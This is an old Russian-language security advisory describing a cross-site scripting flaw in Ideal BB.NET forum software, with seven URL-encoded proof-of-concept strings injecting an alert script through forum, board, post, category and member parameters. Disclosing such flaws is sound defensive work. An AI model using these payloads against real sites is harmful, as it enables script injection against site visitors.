Межсайтовый скриптинг в Ideal BB.NET

Дата публикации:
20.12.2005
Дата изменения:
16.10.2006
Всего просмотров:
2141
Опасность:
Низкая
Наличие исправления:
Нет
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Межсайтовый скриптинг
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Ideal BB.NET 1.x
Ideal BB.NET 2.x
Уязвимые версии: Ideal BB.NET 1.3, 2.0.31.11

Описание:
Удаленный пользователь может произвести XSS нападение.

Уязвимость существует при обработке входных данных в параметрах "forumID", "boardID", "postID", "catID" и "memberID" перед выводом информации в браузер жертвы на странице стандартной ошибки ("/ibb/errors/Error.aspx").Удаленный пользователь может с помощью специально сформированного URL выполнить произвольный HTML код в браузере жертвы в контексте безопасности уязвимого сайта. Пример:

/topics.aspx?forumID=59%22%3E%3Cscript%3Ealer
t('r0t')%3C/script%3E

/categoryindex.aspx?boardID=1%22%3E%3Cscript%3
Ealert('r0t')%3C/script%3E

/topics.aspx?date=12/05/2005&boardID=1%22%3E%
3Cscript%3Ealert('r0t')%3C/script%3E

/posts.aspx?postID=%22%3E%3Cscript%3Ealert(
'r0t')%3C/script%3E

/forums.aspx?catID=%22%3E%3Cscript%3Ealert(
'r0t')%3C/script%3E

/member.aspx?memberID=%22%3E%3Cscript%3Eal
ert('r0t')%3C/script%3E

/topics.aspx?forumID=54&topicRepeater1-p=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

URL производителя: www.idealscience.com/site/products/idealbb.net.aspx

Решение: Способов устранения уязвимости не существует в настоящее время.

Источник:

Ссылки: Ideal BB.NET 1.3 XSS vuln

или введите имя

CAPTCHA